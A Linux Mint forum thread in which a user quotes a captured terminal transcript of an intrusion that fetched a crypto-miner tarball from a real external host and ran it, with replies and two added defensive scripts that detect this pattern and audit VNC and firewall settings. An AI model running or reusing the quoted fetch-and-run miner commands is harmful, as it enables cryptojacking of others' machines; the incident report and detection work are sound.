How did I get hacked? - Solved
Forum rules
Before you post read how to get help. Topics in this forum are automatically closed 6 months after creation.
Hi all, hoping someone can help me with some security advice.
I recently installed Linux Mint Cinnamon 18.3 on one of my boxes. I left it running overnight with an open Terminal window (I was running Handbrake on a bunch of my DVDs). The following morning I found evidence in the Terminal window that I had been hacked - the commands below had been run (I've omitted the output from the commands as there was a lot of it):
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $
I've done some searching and this appears to be an attempt to hijack my PC to mine some crypto currency (Monero or Aeon, not sure). Anyway, the "screen" command failed (not installed) and the shell script x.sh issued a whole load of error messages so the hacker was out of luck.
I don't have anti-virus installed (I know, big mistake, but lesson learned) but I still don't understand how I got hacked. I only installed software from the Software Centre, and I only visited reputable sites mainly to get info on how to do things in Linux.
I switched the box off (after copying the evidence to another server) and will be reinstalling Linux Mint afresh before I use it again. I'm looking for advice on how to protect myself better, e.g. what anti-virus to install, and anything else I can do.
Thanks in advance.
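The transcript above is a textbook "drop and run" sequence: size up the CPU, hide a staging directory under /tmp behind a dot-name, fetch and unpack a tarball, make everything executable, try to detach, run the script. The triage script below is an added example (not code from the post or from Linux Mint) that scores a captured shell transcript against those indicators so a defender can tell this pattern apart from ordinary use. The sample transcripts are constructed inline; the download host is a placeholder (attacker.example), not the URL from the post.

```shell
#!/bin/sh
# Triage of a captured interactive-shell transcript for the "drop and run"
# sequence: hardware recon, dot-named staging directory under /tmp, tarball
# fetched and unpacked, payload made executable, detach attempt, miner name.
# Each indicator counts once; the verdict depends on how many line up.

# Constructed sample modelled on the post's transcript (placeholder host).
SAMPLE_TRANSCRIPT='peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget attacker.example/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh'

# Constructed benign session for comparison.
BENIGN_TRANSCRIPT='peter@TheBeast ~ $ ls -la
peter@TheBeast ~ $ cd ~/src/project
peter@TheBeast ~/src/project $ make
peter@TheBeast ~/src/project $ sudo apt update'

# indicator FILE PATTERN LABEL: prints 1 if the case-insensitive extended
# regex matches anywhere in FILE, else 0; the label goes to stderr.
indicator() {
    if grep -Eiq -- "$2" "$1"; then
        printf '  [x] %s\n' "$3" >&2
        echo 1
    else
        echo 0
    fi
}

# triage_score FILE: number of distinct indicators present (0..8).
triage_score() {
    f=$1
    s=0
    s=$((s + $(indicator "$f" 'lspci|nproc|/proc/cpuinfo' 'hardware recon: miners size themselves by core count')))
    s=$((s + $(indicator "$f" '(mkdir|cd) (/tmp/|/var/tmp/|/dev/shm/)?(\.\.\.+|\.[^./[:space:]])' 'dot-named staging directory such as "..." or ".x"')))
    s=$((s + $(indicator "$f" '(wget|curl) .*\.(tgz|tar\.gz|tar|zip)' 'archive downloaded from the shell')))
    s=$((s + $(indicator "$f" 'tar +-?x' 'archive unpacked')))
    s=$((s + $(indicator "$f" 'chmod \+x' 'payload made executable')))
    s=$((s + $(indicator "$f" '(^|[[:space:]])(screen|nohup|tmux|setsid|disown|crontab)([[:space:]]|$)' 'detach or persistence attempt')))
    s=$((s + $(indicator "$f" 'xmr-stak|xmrig|aeon|monero|minerd|stratum\+tcp' 'known miner name')))
    s=$((s + $(indicator "$f" '\./[^[:space:]]+\.sh' 'script run from the staging directory')))
    echo "$s"
}

# triage_verdict FILE: "suspicious" when 4 or more indicators line up.
triage_verdict() {
    if [ "$(triage_score "$1" 2>/dev/null)" -ge 4 ]; then
        echo suspicious
    else
        echo clean
    fi
}

# leftover_staging_dirs: dot-named directories still sitting in the usual
# scratch locations on this machine (worth listing before a reinstall).
leftover_staging_dirs() {
    find /tmp /var/tmp /dev/shm -maxdepth 2 -type d -name '.*' 2>/dev/null || true
}

# Stand-alone demo on the constructed samples.
tmp_bad=$(mktemp); tmp_ok=$(mktemp)
printf '%s\n' "$SAMPLE_TRANSCRIPT" > "$tmp_bad"
printf '%s\n' "$BENIGN_TRANSCRIPT" > "$tmp_ok"
echo "sample transcript: $(triage_verdict "$tmp_bad") ($(triage_score "$tmp_bad" 2>/dev/null)/8 indicators)"
echo "benign transcript: $(triage_verdict "$tmp_ok") ($(triage_score "$tmp_ok" 2>/dev/null)/8 indicators)"
rm -f "$tmp_bad" "$tmp_ok"
echo "dot-named directories under /tmp, /var/tmp, /dev/shm on this host:"
leftover_staging_dirs
```

Run it against a saved copy of the terminal output (`triage_verdict saved.txt`); each matched indicator is printed to stderr so the score can be explained. The thresholds are deliberately crude: a single `tar xvf` or `chmod +x` is everyday use, and only the combination is telling.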
Last edited by LockBot on Wed Dec 28, 2022 7:16 am, edited 2 times in total.
Reason: Topic automatically closed 6 months after creation. New replies are no longer allowed.
Re: Not another Mint anti virus question.
Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
Don't say anti-virus is unnecessary, it most definitely is necessary
Re: Not another Mint anti virus question.
PPPeter wrote:
Why do so many people say that you don't need anti-virus for Linux?

Because it's true.
And even if it's true that you got hacked, that is a very different thing than a virus. Let's not confuse things.
If your issue is solved, kindly indicate that by editing the first post in the topic, and adding [SOLVED] to the title. Thanks!
- Pjotr
- Level 24
- Posts: 20121
- Joined: Mon Mar 07, 2011 10:18 am
- Location: The Netherlands (Holland) 🇳🇱
- Contact:
Re: Not another Mint anti virus question.
PPPeter wrote:
Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
Don't say anti-virus is unnecessary, it most definitely is necessary

More proof please.
And even if you could supply this proof: why do you think that AV would have protected you against this hijack attempt?
Last edited by Pjotr on Wed Feb 07, 2018 7:48 am, edited 1 time in total.
Tip: 10 things to do after installing Linux Mint 21.3 Virginia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Re: Not another Mint anti virus question.
PPPeter wrote:
After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

This would have been the most stupid attacker, if he demonstrates his activity in such an obvious way. Actually this looks like somebody had local access. No AV would be able to do anything against that. - And you seem to have made the mistake of not at least locking your screen over night.
Or with another attempt to interpret your post: if you really did nothing except what you described, then it would mean that the attack had been built inside of your system. Think about it.
If I look at your other post / thread, then it is obvious that what you wrote here (installed nothing from outside of the official repositories) is simply untrue. Think about that also.
- Pjotr
Re: How did I get hacked?
A hacking attempt has nothing to do at all with a virus. So antivirus certainly wouldn't have helped against this. I advise to remove that newly installed AV from your system, because it'll only make it less secure.
It looks like a local attack: somebody who had physical access to your computer. If you leave the computer on during your absence, make sure that your screen is locked with a password.
Or even better: lock the room in which you've put your computer, because physical access will always remain a risk. No matter what.
Keep your system fully updated, don't install stuff from non-official repo's, be careful with browser add-ons, sandbox some high-risk applications (web browsers!) with Firejail and above all: use your common sense. Do all that, and then: relax, you're running Linux.
- Pjotr
Re: Not another Mint anti virus question.
This is the link to the separate topic that PPPeter has started for his problem:
viewtopic.php?f=18&t=263447
--Edit: rectified.
Last edited by Pjotr on Wed Feb 07, 2018 7:56 am, edited 2 times in total.
Re: Not another Mint anti virus question.
This thread is, what I mentioned in my last sentence.
- Pjotr
Re: Not another Mint anti virus question.
Cosmo. wrote:
This thread is, what I mentioned in my last sentence.

Yes, sorry, my wording was inexact. I'll rectify my previous message.
Re: How did I get hacked?
The line where "chmod" was mistyped at first alone makes it obvious that there was a human at work.
- tdockery97
- Level 14
- Posts: 5058
- Joined: Sun Jan 10, 2010 8:54 am
- Location: Mt. Angel, Oregon
Re: Not another Mint anti virus question.
Proof: these are the commands (output omitted for brevity) I found in the terminal window:
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $
I agree, it must have been a very stupid attacker. And no, it was not someone sitting at the computer, unless they broke into my property while I was asleep and did nothing else other than sit at my PC and run a few commands. Yes, I did leave the computer unlocked - a mistake I won't make again. Clearly you guys think I'm trolling, I'm not, I'm just relaying my experience. Maybe you are right, maybe anti-virus wouldn't have helped, in which case please tell me what would have helped. And don't insinuate that I am lying. I don't even know how to install anything outside of the software center and I have never accessed my email accounts in Linux.
Re: How did I get hacked?
Thanks for the replies. I am 100% certain it was not a local attack, I live alone and my property is secure. I haven't yet installed an anti-virus, perhaps I don't need to. I will certainly be more security conscious in future and shut down the PC whenever I am not physically present. I only left it on as I was running Handbrake in batch mode. That's all done now.
Re switching on firewall, Steve Gibson's "Shields Up" gives my router a "perfect TruStealth" rating, whatever that means. Do I need to configure anything in Linux for a firewall?
Thanks again.
Re: How did I get hacked?
The firewall in Linux Mint is installed, but not turned on. Open a Terminal and type

    sudo ufw status

and that will tell you if the firewall is active or not. If it isn't, then type

    sudo ufw enable
Please edit your original post title to include [SOLVED] - when your problem is solved!
and DO LOOK at those Unanswered Topics - - you may be able to answer some!.
Re: Not another Mint anti virus question.
https://www.virustotal.com/#/file/21587 ... /detection
So you can be certain that AV wouldn't have helped...
...it appears to be a Monero miner btw:
https://github.com/fireice-uk/xmr-stak
Re: Not another Mint anti virus question.
I don't see how remote access would open or leave open a terminal window on your desktop by using ssh or any terminal access, the only way that this could be done (afaik) is to use a vnc program that logs into DESKTOP:0.
You mentioned in an earlier post that you searched for info on vnc, did you go through setting up Desktop Sharing (vino)? If so did you leave it enabled and leave all security settings unchecked?
The firewall in Mint isn't enabled by default, was it enabled (to default allow-out, deny-in) during your episode?
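The two exposures raised in the thread, desktop sharing (vino, which serves the live :0 desktop over VNC, and so would explain commands appearing in an open terminal window) and a firewall that Mint ships disabled, can be audited in a few lines. The script below is an added example, not code from the forum or from Linux Mint. It assumes the org.gnome.Vino gsettings keys `enabled`, `prompt-enabled`, `require-encryption` and `authentication-methods`, and the output format of `sudo ufw status verbose`; the decision logic is kept separate from the live reads so it runs on constructed values too.

```shell
#!/bin/sh
# Audit of vino desktop sharing and ufw posture. Decision functions are pure
# shell; "--live" reads the real settings on this machine.

# assess_sharing ENABLED PROMPT REQUIRE_ENC AUTH_METHODS
# Values as printed by "gsettings get": true/false, and ['none'] or ['vnc'].
# Classifications: disabled, exposed (no password and no confirmation
# prompt), weak (password but no encryption), ok, unknown.
assess_sharing() {
    en=$1; prompt=$2; enc=$3; auth=$4
    case "$en" in
        false) echo disabled; return 0 ;;
        true)  ;;
        *)     echo unknown; return 0 ;;
    esac
    case "$auth" in
        *none*)
            # No password required; only a confirmation prompt stands in the way.
            if [ "$prompt" != true ]; then echo exposed; return 0; fi ;;
    esac
    if [ "$enc" != true ]; then
        echo weak      # password and session travel unencrypted
    else
        echo ok
    fi
}

# firewall_posture TEXT: classify "ufw status verbose" output.
firewall_posture() {
    if printf '%s\n' "$1" | grep -q '^Status: active'; then
        if printf '%s\n' "$1" | grep -q 'deny (incoming)'; then
            echo active-deny-in
        else
            echo active-permissive
        fi
    else
        echo inactive
    fi
}

# live_audit: run the checks on this host (needs gsettings, ufw, ss).
live_audit() {
    if command -v gsettings >/dev/null 2>&1; then
        en=$(gsettings get org.gnome.Vino enabled 2>/dev/null || echo unknown)
        pr=$(gsettings get org.gnome.Vino prompt-enabled 2>/dev/null || echo unknown)
        re=$(gsettings get org.gnome.Vino require-encryption 2>/dev/null || echo unknown)
        au=$(gsettings get org.gnome.Vino authentication-methods 2>/dev/null || echo unknown)
        echo "desktop sharing: $(assess_sharing "$en" "$pr" "$re" "$au")"
    fi
    if command -v ufw >/dev/null 2>&1; then
        echo "firewall: $(firewall_posture "$(sudo ufw status verbose 2>/dev/null || true)")"
    fi
    if command -v ss >/dev/null 2>&1; then
        echo "listeners on the VNC port (5900):"
        ss -ltn 2>/dev/null | grep ':5900' || echo "  none"
    fi
}

# Constructed "ufw status verbose" outputs for the demo.
UFW_OFF='Status: inactive'
UFW_ON='Status: active
Logging: on (low)
Default: deny (incoming), allow (outgoing), disabled (routed)
New profiles: skip'

if [ "${1:-}" = --live ]; then
    live_audit
else
    echo "sharing on, no password, no prompt:  $(assess_sharing true false true "['none']")"
    echo "sharing on, password, no encryption: $(assess_sharing true true false "['vnc']")"
    echo "sharing on, password, encrypted:     $(assess_sharing true false true "['vnc']")"
    echo "sharing off:                         $(assess_sharing false false false "['none']")"
    echo "ufw as shipped:                      $(firewall_posture "$UFW_OFF")"
    echo "after 'sudo ufw enable':             $(firewall_posture "$UFW_ON")"
fi
```

Without arguments the script only demonstrates the classification on the constructed values; `sh audit.sh --live` reads the real vino keys, the ufw status and any listener on port 5900. A router that scores "TruStealth" on the outside says nothing about what is reachable from the LAN, which is where a VNC listener without a password would be found.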
Re: How did I get hacked? - Solved
Assuming that I've not misunderstood your post:
Just to dispel the myth... Linux is not magically immune to malware, you're just less likely to be infected in Linux than Windows. Note the "less likely", regardless of what others will continually tell you, it is not impossible.
Now, if you are 100% certain that nobody had physical access to your machine, and you don't have multiple personalities (I'm being serious, some people have such an illness) - then you were either hacked or you have a Poltergeist. Either way, it warrants further investigation. If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.
However, I suspect that someone was following an online guide... they never made it to the "Erasing your tracks" section - and the fact you can see all those commands reinforces the idea that they didn't know what they were doing.
So I suggest that you copy/paste your post to other forums more focused on security. You may never find out what happened, and it may never happen again, but you might get a meaningful explanation of what and why... though not who.
Re: How did I get hacked? - Solved
Don't be gullible. This poster just signed on so has no history on this forum. My conspiracy theory is that they made this up as they could not actually hack Linux themselves. This could be an attempt at spreading fear among the users. I for one am not afraid which is one reason I can see right through stuff like this.
I apologize to the OP if I am wrong but I do not believe in coincidence.
- Pjotr
Re: How did I get hacked? - Solved
Nobody said that.
@Ozo: that thought has crossed my mind as well.